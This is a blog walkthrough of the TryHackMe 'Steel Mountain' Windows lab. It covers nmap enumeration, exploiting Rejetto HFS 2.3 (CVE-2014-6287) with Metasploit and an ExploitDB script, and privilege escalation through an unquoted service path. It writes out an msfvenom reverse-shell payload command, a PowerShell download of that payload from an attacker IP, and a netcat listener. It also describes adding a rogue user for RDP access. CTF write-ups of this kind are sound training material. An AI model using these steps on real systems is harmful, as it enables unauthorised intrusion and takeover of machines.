If you are a subscriber, please do complete this room first. This will teach you Hell lot of things related to Windows, powershell usage and priv-esc in windows… If you are new to windows, don’t worry, you can still try this room. Though I’m not a big fan of Edison, but one thing about him, I heard was that he succeeded after 1K tries, so keep trying!!
So, lets jump right in…
Task 1 Introduction
So, at first deploy the machine, wait for it to bootup.
Lets start with our scanning phase with our good, old and promising friend, nmap:
After scanning I got this:
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Microsoft IIS httpd 8.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server? syn-ack
| ssl-cert: Subject: commonName=steelmountain
| Issuer: commonName=steelmountain
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2021-07-08T20:51:28
| Not valid after: 2022-01-07T20:51:28
| MD5: 8709 a020 40c7 71ec 1907 0372 5df5 4657
| SHA-1: 3b81 38bf 7186 0a82 371c 3c1d 443a 9380 bb95 dc5e
| -----BEGIN CERTIFICATE-----
| MIIC3jCCAcagAwIBAgIQITncN5pTTpdHnXhGU++U6jANBgkqhkiG9w0BAQUFADAY
| MRYwFAYDVQQDEw1zdGVlbG1vdW50YWluMB4XDTIxMDcwODIwNTEyOFoXDTIyMDEw
| NzIwNTEyOFowGDEWMBQGA1UEAxMNc3RlZWxtb3VudGFpbjCCASIwDQYJKoZIhvcN
| AQEBBQADggEPADCCAQoCggEBALzk2LgS0GGlrXEskHH8pi0br2id1tecmaIZi93t
| O1lIGrM3iY+P1DUn7xNavZhf+Sn3AP/ON3b7KXPXk8IhWN4gEOdS4BMTrp1X8f/D
| XK2LmDBkbmQkt6MJxEYSut3mfFeLoXR86cofkJSjUzb65VFv79Jhx9LUVvkwRw7t
| uAKaFEzzWmw91TiEDveFyt7XzVUj3wh5QBtzhBhhNEXiMRDRZFYTycxUO8tVCsZ7
| +PYtFuXGqZN8+5564GOk3AusIa7BiCBnmL64gunwyJSowh/FmFBfSAdsYBR/2U7H
| GVLGfYSRboHogwSPkaxcM6BEBV0U2A2Brm72paCgNTT2rNsCAwEAAaMkMCIwEwYD
| VR0lBAwwCgYIKwYBBQUHAwEwCwYDVR0PBAQDAgQwMA0GCSqGSIb3DQEBBQUAA4IB
| AQBZv4CI0Lo9rbjCpY97G3yi5h9eNyxpzgNhpcJlGUC1s5EqfxaTun/dMSA4wkHK
| AZPEJz2mqHS1FWijz0mhMPZoQtWmqiEKsheThAeeijt+zWFiiGBR/kh350qE953n
| UhBiyzIn5fnLIH/IdXkDX88dW59YLvcSh/T/I9I/SSEvHKVnxoK/cwK9jp67jMHx
| yJqYpnouqgRn9/6vCcdPJfyeAtUBPBBESn4zbZuqTmwEPGhKEQcCQ9k4WvCDioCI
| DIr/ee8g3iEXy0aegLrDpEFaQObbNzqGu/7HxUmzhE2EUCkab2APP5YsPUzL+afl
| LMp6NHY3HrfSLMx5V18P/bkh
|_-----END CERTIFICATE-----
|_ssl-date: 2021-07-09T21:01:01+00:00; -1s from scanner time.
8080/tcp open http syn-ack HttpFileServer httpd 2.3
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: HFS 2.3
|_http-title: HFS /
49152/tcp open msrpc syn-ack Microsoft Windows RPC
49153/tcp open msrpc syn-ack Microsoft Windows RPC
49154/tcp open msrpc syn-ack Microsoft Windows RPC
49155/tcp open msrpc syn-ack Microsoft Windows RPC
49156/tcp open msrpc syn-ack Microsoft Windows RPC
49163/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:28:8b:ec:85:33 (unknown)
| Names:
| STEELMOUNTAIN<20> Flags: <unique><active>
| STEELMOUNTAIN<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| Statistics:
| 02 28 8b ec 85 33 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 35667/tcp): CLEAN (Couldn't connect)
| Check 2 (port 24587/tcp): CLEAN (Couldn't connect)
| Check 3 (port 17430/udp): CLEAN (Failed to receive data)
| Check 4 (port 39146/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-09T21:00:55
|_ start_date: 2021-07-09T20:51:22
If are not getting this result, try this nmap command: nmap <ip> -sV -A -vv
. You can use your own nmap command too.
Lets look at all the attractive ports: 80, 3389, 8080, etc and start our enumeration.
We can see from the nmap result that we have 2 web servers running one on port 80 and another on 8080
We can see there is a picture saying employee of the month.
First question is:
Who is the employee of the month?
I think we have to reverse image search this, as I was not able to find any juicy info by inspecting the webpage’s code base.
In hint: it is also written Reverse image search
Do some google search on it. You will surely get it.
So, first one done ✔.
Task 2 Initial Access
Another web server shows this. We can see here, HttpFileServer2.3 is running (Server Infos). If we click on it, we can see We are redirected to another webpage and name came up called rejetto.
First question under Task 2 Initial Access:
- Scan the machine with nmap. What is the other port running a web server on?
→ You Know the answer, right??
2. Take a look at the other web server. What file server is running?
→ We also know this, aren’t we ??
We can use rejetto to search for exploit using Searchsploit:
We can see various exploit on it, but search for the right version and then correspondingly choose (copy) the exploit path and search in ExploitDB. Hint: Exploit is written by Avinash Thapa.
With this, We also got the answer of the 3rd question
3. What is the CVE number to exploit this file server?
→ We got the right one, you probably shoud get this
4. Use Metasploit to get an initial shell. What is the user flag?
So, now come the exploitation phase.
Yaah, You heard right…
At first we will do it with Metasploit (automated) and then manually, OK ??
So, lets open Msfconsole and search for rejetto.
Hey, if you havn’t used Metasploit before, you can try this free room of THM on metasploit. But you can follow me along, I will break down what is actually gonna happen.
What we are doing is we would use this exploit to gain access on target system on port 8080 on which HttpFileServer2.3 rejetto in running. Here, we will not use the ExploitDB CVE exploit that we got earlier while searching answer for question #3, we will use that script later in the manual exploitation portion of this Blog.
So, here in metasploit, the exploit type is RCE (Remote Code Execution).
Inner Working:
According to the CVE details for this vulnerability (CVE-2014–6287), the findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (otherwise known as HFS or HttpFileServer) 2.3x (in versions prior to 2.3c) allows remote attackers to execute arbitrary programs via a %00 sequence in a search action. source: link
And the payload portion will actually give us remote shell from target to control it.
Here is the settings option:
If are confused why we are using SRVHOST and SRVPORT apart from using LHOST and LPORT.
see this: security.stackexchange
Now lets, exploit it:
Yaah, we got a meterpreter shell!!!
Lets, now find the flag: named user.txt
A hint was given on the last question:
C:\Users\bill\Desktop
So, let open a shell change to that directory and get the flag:
Here, we go. We have successfully got the User flag. Intentionally, I haven’t included the flag because I’m Cruel 😈.
Task 3 Privilege Escalation
So, now comes the most fun part. Escalation of our privilege.
According to THM, we are instructed to use PowerUp.ps1 (which is a powershell script) by Will (aka harmj0y). Here it is a blog post by Will himself.
Now we have to upload PowerUp.ps1 script to target so that we can enumerate the machine for PrivEsc.
We would do that like this:
PowerUp.ps1 will run a series of scans on the target to look for vulnerabilities based on pre-determined signatures (like, service abuse checks, .dll hijacking opportunities, registry checks, etc). In this case PowerUp returns that the machine is vulnerable to Unquoted Service Path (USP) exploitation in the AdvancedSystemCareService9 service path directory.
To more about USP: link
Now lets use it: To run the powershell script, we will use metasploit built-in powershell
Mine powershell was already loaded earlier…
Now, we will get scanning results on the screen
NOTE:
Running Invoke-AllChecks will output any identifiable vulnerabilities along with specifications for any abuse functions.
Small portion of the result generated:
In THM, it is asked to “Take close attention to the CanRestart option that is set to true. What is the name of the service which shows up as an unquoted service path vulnerability?”
From the result, You can find out this answer.
We can see from the result that C:\Program Files (x86)\IObit\Advanced SystemCare
is the directory which have "space" in between the directory path → we can abuse this area like putting a malicious file in that space just like this:
From here:
C:\Program Files (x86)\IObit\Advanced SystemCare
To:
C:\Program Files (x86)\IObit\Advanced
i.e. we have to make an executable file (payload) named Advanced so that we can execute this file to gain shell.
But there is one catch, we have to see whether we can restart that service on that particular path or not??
We found that C:\Program Files (x86)\IObit\Advanced SystemCare
is the only path in which service can be restarted.
CanRestart : True
That means we can start with this.
We just have to make a payload with msfvenom:
$ msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=1234 -e x86/shikata_ga_nai -f exe -o Advanced.exe
Then uploading it with the help of previous meterpreter session.
Now lets Copy this file (Advanced.exe) to our trgt directory C:\Program Files (x86)\IObit\
. Now with Advanced.exe, trgt path becomes→C:\Program Files (x86)\IObit\Advanced
.
We will use, powershell for it:
Now the best part:
Now we only have to listen on port 1234 with exploit/multi/handler
We use the same payload option as of used to make payload with msfvenom. Otherwise, payload will not work.
Now, as mentioned earlier in the Room that we will have to exploit those USP vulnerability in which service can manipulated (restarted) by the current user(bill).
We know that Service can be manipulated i.e. restarted by Bill, from seeing the result generated by PowerUp.ps1 script. We have to also become sure whether this service can be manipulted by current user or not?
Yes, we can…
Lets again see the the result generated by PowerUp.ps1 script. we saw:
In THM, it is written, “The service showed up as being unquoted (and could be exploited using this technique), however, in this case we have exploited weak file permissions on the service files instead.”
So, now we are sure that we can stop and Start the service, in order to set the memory to run the new altered path.
NOTE:
Here, It says, “service is not responding” →Which Totally makes sense!! as legit service is not being run by them…
Now see the listener:
Yup!!, You have seen it right!!, We got a shell as well as the root flag.
NOTE:
NT Authority is the highest privileged user in windows (just like root in linux) who can do anything with the System.
So, Auto Exploit Challenge is done….
Now, comes the Most Fun Part:
Task 4 Access and Escalation Without Metasploit (Manual)
In this challenge, we will find out PE vectors (PrivEsc Vectors) differently, using winPEAS.
We will now use the previously got ExploitDB CVE exploit using Searchsploit in Task2, question #3.
Let’s first donwload that, and go through the instructions written on it.
We can see, the instructions.
The script is basically downloading the nc.exe script from Web server hosting nc.exe file in first attempt. Then again in the 2nd try, it will establish a netcat C2 session between them. For this reason multiple times.
So, at first lets set up ip and port coressponding to your attacker machine:
So now lets get it done:
Target port is 8080 as it is where rejetto web server is running.
So, now let us upload winPEAS.exe to target machine after downloading from link
Downloding winPEAS.exe, not uploading here because we have not got any meterpreter shell here, so we don’t that privilege to do that here.
Used Powershell to download this file.
Now lets, run this:
> winPEAS.exe
We will get a ton of information about System:
Just remember this:
Just see this remarks, that what color indicates what…
After some searching, you will get these lines:
Here, we can see that these are those vulnerable paths that we got earlier in automated Exploitaion portion. But, if you remember correctly, we haven’t got the 2nd file PATH, right??
Why is so now, it was not there in automated exploitation part, right??
It is not running or something ???, I… don’t know, let’s see…
Now in room, there is a question:
- What powershell -c command could we run to manually find out the service name?
“Format is “powershell -c “command here”*
We can see all services with status: running/stopped…
But we have to find out which service which are running only…
I have used Where-Object
which is like grep (for linux) alternative, present in powershell for powershell Users.
Yupp!!! we can see that IObit is not running as per the result generated by the powershell command.
NOTE: IObit was another path that was shown in the result generated by winPEAS.exe previously.
Here, we can’t see the Name properly, lets do some more slicing:
Now the name is clearly visible, we need this to restart the service, so that service path in the memory gets reset to the present altered PATH.
Now lets, see whether Our user Bill has sufficient permission to do that or not??
First move to the C:\Program Files (x86)\IObit directory:
We have hell lot of permission for that path!!!
So, lets exploit USP vulnerability:
Upload the msfvenom payload (rather download), that we made earlier or you can make it again.
Move to “C:\Program Files (x86)\IObit” path:
Here, I used a powershell command:
powershell -c Invoke-WebRequest “http://10.8.112.253/Advanced.exe -outFile Advanced”
Please note that I used output file as Advanced as it will overwrite the previous file named Advanced.
And You can also check the size of the Advanced file whether it has changed or not to become sure that this command did it’s work successfully.
Now just by stopping and starting the service, we would get a shell, Why??
As the service path in the memory gets reset to the present PATH, which is now has our crafted payload.
You know, how to start and stop service, as I have mentioned it earlier in automated exploitation part.
Before that set up a listener:
$ nc -nlvp 6666
Hell Yaah!! We got a shell…
So, are we done now??
Nay!!!
We will add our own user to it and login via RDP.
Now lets login via RDP, I used remmina here.
There we go…
Our account is created, so we can login to our account via RDP. This is one reason, why hacking windows is more relieving than linux to me (Yes, if RDP was closed, ending will not be as relieving as this 🤣) .
If you have anything to ask, ask me here, or on linkedin or on twitter. See ya 👋!!